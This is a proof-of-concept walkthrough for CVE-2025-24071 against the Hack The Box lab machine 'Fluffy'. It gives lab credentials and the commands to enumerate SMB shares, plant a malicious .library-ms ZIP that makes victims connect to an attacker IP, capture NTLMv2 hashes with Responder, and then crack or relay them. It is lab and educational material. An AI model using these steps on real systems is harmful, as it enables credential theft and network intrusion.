# CVE-2025-24071 ### Proof of Concept for CVE-2025-24071: Windows File Explorer Spoofing Vulnerability ### Vulnerability CVE-2025-24071 ### Type Windows File Explorer Spoofing via `.library-ms` files ### CVSS Score 7.8 (High) ### Description CVE-2025-24071 is a spoofing vulnerability in Windows File Explorer that leverages the `.library-ms` file format. An attacker can craft this file to trick the user into connecting to a remote SMB server, potentially leaking NTLMv2 credentials. ### Environment Setup * **Attacker (You):** Kali Linux on VPN, IP: `10.10.14.228` * **Victim: HTB Machine "Fluffy"** * **Domain:** `fluffy.htb` * **Valid credentials:** Username: `j.fleischman`, Password: `J0elTHEM4n1990!` * **Writable SMB share discovered:** `IT` ### Step 1: Enumerate SMB Shares First, let's see what shared folders are available on the target and if we can write to any. ```bash nxc smb 10.129.60.202 -u j.fleischman -p J0elTHEM4n1990! --shares ``` Expected output: ```bash SMB 10.129.60.202 445 DC01 Share Permissions Remark SMB 10.129.60.202 445 DC01 ----- ----------- ------ SMB 10.129.60.202 445 DC01 ADMIN$ Remote Admin SMB 10.129.60.202 445 DC01 C$ Default share SMB 10.129.60.202 445 DC01 IPC$ READ Remote IPC SMB 10.129.60.202 445 DC01 IT READ,WRITE SMB 10.129.60.202 445 DC01 NETLOGON READ Logon server share SMB 10.129.60.202 445 DC01 SYSVOL READ Logon server share ``` The `IT` share is what we’re interested in because it has both READ and WRITE permissions. ### Step 2: Build the Exploit File Now we’ll use the public exploit script to generate a malicious `.library-ms` file wrapped in a ZIP. ```bash python3 exploit.py -i 10.10.14.228 -f Reports ``` This command tells the script: * `-i`: Your local IP address (Kali machine) or VPN (tun0) * `-f`: The name of the file we want to generate (e.g., Reports.library-ms) After it runs, you’ll see a ZIP file called `exploit.zip` this is what we’ll upload to the target. ### Step 3: Upload the Exploit We now push our `exploit.zip` file to the writable SMB share (`IT`) like this: ```bash smbclient //10.129.60.202/IT -U j.fleischman%J0elTHEM4n1990! ``` Then, within the `smbclient` prompt: ```bash put exploit.zip ``` The share should now look like this: ```bash smb: \> ls . D 0 Tue May 27 06:11:42 2025 .. D 0 Tue May 27 06:11:42 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 15:08:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 15:04:05 2025 exploit.zip A 322 Tue May 27 06:11:42 2025 KeePass-2.58 D 0 Fri Apr 18 15:08:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 15:03:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 14:31:07 2025 ``` ### Step 4: Set Up Responder to Capture Hashes Now, start Responder on your VPN interface to catch any incoming SMB authentication attempts: ```bash sudo responder -I tun0 -v ``` Make sure the Responder window stays open it will capture NTLMv2 hashes automatically when the file is opened by the victim. ### Step 5: Wait for the Victim to Open the File Once someone opens `exploit.zip` and interacts with `Reports.library-ms`, their system will silently try to connect to your Kali box. Responder will then capture their NTLMv2 hash. You’ll see output like: ```bash [SMB] NTLMv2-SSP Username : FLUFFY\p.agila [SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:::... ``` ### What Can You Do With This Hash * You can crack it using `hashcat` or `john` to retrieve the plaintext password * Or, relay it in real-time to escalate privileges in certain scenarios (e.g., with `ntlmrelayx`) ### Resources * [GitHub Exploit](https://github.com/ThemeHackers/CVE-2025-24071) * [MITRE CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24071) * [HTB Machine](https://app.hackthebox.com/machines/Fluffy)